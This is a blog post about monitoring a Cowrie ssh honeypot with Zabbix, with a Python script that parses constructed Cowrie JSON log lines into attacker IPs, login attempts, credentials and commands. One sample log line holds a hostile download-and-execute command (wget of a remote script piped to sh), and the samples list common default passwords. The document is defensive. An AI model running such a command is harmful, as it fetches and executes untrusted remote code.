Part 146: Monitor Cowrie ssh honeypot with Zabbix

What's up, home? part 146 cover image

Do you know how often your system is attacked, or what the attackers would do if they could actually ssh into your systems?

Cowrie is a funny little ssh/telnet honeypot. It can work in several different modes, but basically it emulates a Linux/Unix shell and captures everything an attacker attempts to do. None of the commands the attacker thinks they are running are real; the output mimics a real shell, and you can configure it to respond to more of them. You can use static responses or even hook Cowrie up to an LLM to come up with responses in slightly laggy real time.

Cowrie then logs the sessions, for example in JSON or plain text format, or it can push the data to Elasticsearch or to many different IP reputation services.

But, as always, I wanted to monitor it with Zabbix to see what happens inside my little honeypot. Quite a lot, I would say.

Setting up Cowrie

Please refer to the Cowrie installation instructions if you want to try it out yourself. You can install it via Docker or PyPI. I created a dedicated cowrie user and installed the PyPI version under it, which made the Zabbix agent integration super trivial afterwards. Cowrie runs as an unprivileged user and listens on port 2222 by default; the Cowrie docs cover redirecting port 22 to it with iptables or authbind. Whatever you do, keep the honeypot on a host you do not use for anything else.

Setting up Zabbix template

My Zabbix agent reads Cowrie's JSON log file and Zabbix then parses the entries with standard item preprocessing. As "everybody" now uses AI, so did I for this template, too.

Cowrie template items

With this template, I get 

  • Attacker IP
  • Successful and failed login attempts
  • Usernames and passwords that were attempted
  • Commands that were run during the session
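To make it concrete what "reading the JSON log and parsing it" means, here is an added example that is not part of the original post or of the Cowrie project: a small Python collector that reads the one-JSON-object-per-line format Cowrie writes when its `[output_jsonlog]` output is enabled (by default to `cowrie.json`) and extracts exactly the four things listed above. The log lines embedded in it are constructed, but follow Cowrie's real event shape (`eventid`, `src_ip`, `session`, `username`, `password`, `input`). It also does two things a honeypot collector should always do: skip malformed lines instead of crashing, and treat command strings as attacker-controlled text (strip control characters, cap the length) before they reach any dashboard.

```python
"""Parse Cowrie JSON log lines and extract attacker IPs, login outcomes,
attempted credentials and commands per session.

Added example, not code from the original post or the Cowrie project.
Sample log lines are constructed, modelled on Cowrie's JSON event format.
"""
import json
from collections import Counter, defaultdict

# Constructed cowrie.json content: one JSON object per line, plus one
# deliberately corrupt line to show the collector tolerates it.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "src_port": 51022, "dst_ip": "10.0.0.5", "dst_port": 2222, "session": "a1b2c3d4e5f6", "protocol": "ssh", "timestamp": "2024-05-01T10:00:00.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "123456", "timestamp": "2024-05-01T10:00:01.000000Z"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "admin", "timestamp": "2024-05-01T10:00:02.000000Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "input": "uname -a", "timestamp": "2024-05-01T10:00:03.000000Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "input": "cd /tmp; wget http://198.51.100.9/x.sh; sh x.sh", "timestamp": "2024-05-01T10:00:04.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "duration": 4.2, "timestamp": "2024-05-01T10:00:05.000000Z"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.23", "src_port": 40001, "dst_ip": "10.0.0.5", "dst_port": 2222, "session": "0f0f0f0f0f0f", "protocol": "ssh", "timestamp": "2024-05-01T10:01:00.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.23", "session": "0f0f0f0f0f0f", "username": "admin", "password": "admin", "timestamp": "2024-05-01T10:01:01.000000Z"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.23", "session": "0f0f0f0f0f0f", "username": "pi", "password": "raspberry", "timestamp": "2024-05-01T10:01:02.000000Z"}
{"eventid": "cowrie.session.closed", "src_ip": "198.51.100.23", "session": "0f0f0f0f0f0f", "duration": 2.0, "timestamp": "2024-05-01T10:01:03.000000Z"}
this line is truncated garbage and must not crash the collector
"""

# Commands are typed by the attacker: cap them before they reach a UI.
MAX_COMMAND_LEN = 200


def parse_events(text):
    """Yield one dict per well-formed JSON line; silently skip the rest."""
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue
        if isinstance(event, dict) and "eventid" in event:
            yield event


def sanitize(command):
    """Replace non-printable characters and truncate attacker-supplied input."""
    cleaned = "".join(ch if ch.isprintable() else "?" for ch in command)
    return cleaned[:MAX_COMMAND_LEN]


def summarize(text):
    """Aggregate Cowrie events into the metrics the Zabbix template surfaces."""
    summary = {
        "attacker_ips": Counter(),        # connections per source IP
        "login_success": 0,
        "login_failed": 0,
        "credentials": Counter(),         # (username, password) -> attempts
        "commands": defaultdict(list),    # session id -> commands in order
    }
    for ev in parse_events(text):
        eid = ev["eventid"]
        if eid == "cowrie.session.connect":
            summary["attacker_ips"][ev.get("src_ip", "?")] += 1
        elif eid in ("cowrie.login.success", "cowrie.login.failed"):
            key = "login_success" if eid.endswith("success") else "login_failed"
            summary[key] += 1
            summary["credentials"][(ev.get("username"), ev.get("password"))] += 1
        elif eid == "cowrie.command.input":
            cmd = sanitize(ev.get("input", ""))
            summary["commands"][ev.get("session", "?")].append(cmd)
    return summary


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print("attacker IPs:", dict(s["attacker_ips"]))
    print("logins: %d ok, %d failed" % (s["login_success"], s["login_failed"]))
    for (user, pw), n in s["credentials"].most_common():
        print("  %s/%s x%d" % (user, pw, n))
    for session, cmds in s["commands"].items():
        print("session %s ran: %s" % (session, cmds))
```

On the Zabbix side the same work is done by an active `log[]` item on the agent pointing at `cowrie.json`, with JSONPath preprocessing steps (for example `$.eventid`, `$.src_ip`, `$.input`) and "custom on fail: discard value" on each step, so lines that lack the field are dropped rather than raising an unsupported-item error; the post does not show the exact item keys of the author's template, so treat that as the general recipe rather than a copy of it.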

Example dashboard

Data like this would not do much good if I did not have a dashboard for it. Well, here goes! As you can see, the attacks are constant; silent moments are very rare.

Cowrie example dashboard

All this sure is very educational. Whether monitoring something like this excites me or makes me absolutely terrified, I don't know. It gets even scarier, or more useful, if you feed these logs to the LLM of your choice and ask it to produce a report for you. Just remember that the usernames, passwords and commands in those logs were typed by the attacker, so you are handing attacker-controlled text to the model as part of its prompt.
